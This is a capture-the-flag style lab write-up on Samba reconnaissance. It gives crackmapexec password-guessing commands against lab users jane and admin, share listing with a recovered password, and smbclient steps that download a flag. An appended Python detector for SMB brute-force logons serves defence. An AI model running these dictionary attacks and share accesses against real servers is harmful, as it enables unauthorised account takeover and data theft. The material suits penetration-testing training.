Samba Recon: Dictionary Attack

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Objective: Answer the following questions:

  1. What is the password of user “jane” required to access share “jane”? Use the smb_login Metasploit module with the password wordlist /usr/share/wordlists/metasploit/unix_passwords.txt

  2. What is the password of user “admin” required to access share “admin”? Use Hydra with the password wordlist /usr/share/wordlists/rockyou.txt

  3. Which share is read-only? Use smbmap with the credentials obtained in question 2.

  4. Is share “jane” browseable? Use the credentials obtained in question 1.

  5. Fetch the flag from share “admin”.

  6. List the named pipes available over SMB on the Samba server. Use the pipe_auditor Metasploit module with the credentials obtained in question 2.

  7. List the SIDs of Unix users shawn, jane, nancy and admin respectively by performing RID cycling using enum4linux with the credentials obtained in question 2.

Tools

  • smbmap

  • Metasploit Framework

  • enum4linux

  • smbclient

  • Hydra

Writeup

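# Dictionary attack against user jane with the Metasploit unix_passwords wordlist
crackmapexec smb demo.ine.local -u jane -p /usr/share/wordlists/metasploit/unix_passwords.txt
# Same wordlist against user admin
crackmapexec smb demo.ine.local -u admin -p /usr/share/wordlists/metasploit/unix_passwords.txt
# List the shares and their permissions with the recovered admin credentials
crackmapexec smb demo.ine.local -u admin -p password1 --shares
# Connect to the admin share; the next line is typed at the password prompt
smbclient -U admin //demo.ine.local/admin
password1
# Inside the smbclient session: download the flag archive
cd hidden
get flag.tar.gz
exit
# Back on the Kali shell: unpack the archive and read the flag
gunzip flag.tar.gz
tar -xvf flag.tar
cat flag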
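
Added example (not part of the original writeup): on the Samba server, the dictionary attacks above show up as a burst of failed logons for one account from one source, followed by a success. The detector below flags that pattern; the log records are constructed, and their field names are modeled on Samba's JSON authentication audit log (an assumption), as are the threshold and window values.

```python
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta

TS_FORMAT = "%Y-%m-%dT%H:%M:%S.%f%z"

def _event(ts, status, ip, user):
    # Constructed record; field names modeled on Samba's JSON auth audit log (assumption).
    return json.dumps({"timestamp": ts, "type": "Authentication", "Authentication": {
        "status": status, "remoteAddress": f"ipv4:{ip}:49152",
        "serviceDescription": "SMB2", "clientAccount": user}})

SAMPLE = (  # constructed: a guessing burst against jane, two spaced typos by nancy
    [_event(f"2024-01-01T10:00:0{i}.000000+0000", "NT_STATUS_WRONG_PASSWORD",
            "10.10.0.5", "jane") for i in range(6)]
    + [_event("2024-01-01T10:00:06.000000+0000", "NT_STATUS_OK", "10.10.0.5", "jane"),
       "smbd startup banner line, not JSON",
       _event("2024-01-01T10:01:00.000000+0000", "NT_STATUS_WRONG_PASSWORD", "10.10.0.9", "nancy"),
       _event("2024-01-01T10:06:00.000000+0000", "NT_STATUS_WRONG_PASSWORD", "10.10.0.9", "nancy"),
       _event("2024-01-01T10:06:10.000000+0000", "NT_STATUS_OK", "10.10.0.9", "nancy")]
)

def detect(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag (source, account) pairs with >= threshold failed logons inside the window."""
    recent = defaultdict(deque)  # (source, account) -> failure times still in the window
    alerts = {}                  # (source, account) -> {"failures": n, "compromised": bool}
    for raw in lines:
        try:
            rec = json.loads(raw)
        except json.JSONDecodeError:
            continue             # skip non-JSON log noise
        if rec.get("type") != "Authentication":
            continue
        auth = rec["Authentication"]
        # Drop the ephemeral client port so every connection from one host shares a key.
        key = (auth["remoteAddress"].rpartition(":")[0], auth["clientAccount"])
        when = datetime.strptime(rec["timestamp"], TS_FORMAT)
        q = recent[key]
        while q and when - q[0] > window:
            q.popleft()          # expire failures older than the window
        if auth["status"] == "NT_STATUS_OK":
            if key in alerts and q:
                alerts[key]["compromised"] = True  # success right after a flagged burst
            q.clear()
            continue
        q.append(when)
        if len(q) >= threshold:
            entry = alerts.setdefault(key, {"failures": 0, "compromised": False})
            entry["failures"] = max(entry["failures"], len(q))
    return alerts
```

An alert with "compromised" set means the guessed password worked, so the account needs a credential reset and a review of what was accessed, not only a block on the source address.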
